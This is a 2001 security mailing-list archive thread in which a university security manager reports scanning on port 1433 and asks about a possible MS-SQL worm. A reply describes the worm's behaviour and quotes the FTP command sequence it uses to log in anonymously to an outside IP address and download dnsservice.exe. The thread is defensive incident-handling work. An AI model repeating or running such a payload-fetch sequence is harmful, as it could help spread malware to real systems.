Security Incidents mailing list archives
Re: MS-SQL Worm?
From: "Arthur Donkers" <A.Donkers () reseau nl>
Date: Tue, 20 Nov 2001 17:47:16 +0100
To follow up on my own reply: The worm ftp's to 207.29.192.160 and executes the following ftp commands: ftp foo.com bin cd pub cd tmp get dnsservice.exe close quit using anonymous ftp and foo.com as a password My lesson: first read then reply ... Arthur ----- Original Message ----- From: "Douglas P. Brown" <dugbrown () email unc edu> To: <incidents () securityfocus com>; <unisog () sans org> Cc: "ITS Security" <security () unc edu> Sent: Tuesday, November 20, 2001 3:54 PM Subject: MS-SQL Worm?
We saw a scan come in looking for systems answering on 1433, and immediately saw several systems start scanning out for other systems answering on 1433 - worm behavior? Has anyone else seen this? thanks, -Doug -- Douglas P. Brown University of North Carolina Manager of Security Resources 105 Abernethy Hall
---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
Current thread:
- MS-SQL Worm? Douglas P. Brown (Nov 20)
- Re: MS-SQL Worm? Paul Nasrat (Nov 20)
- Re: MS-SQL Worm? Arthur Donkers (Nov 20)
- Re: MS-SQL Worm? Patrick Andry (Nov 20)
- Re: MS-SQL Worm? Johannes Verelst (Nov 20)
- Re: MS-SQL Worm? Unknown (Nov 20)
- Re: MS-SQL Worm? Arthur Donkers (Nov 20)
- Re: MS-SQL Worm? Paul Nasrat (Nov 20)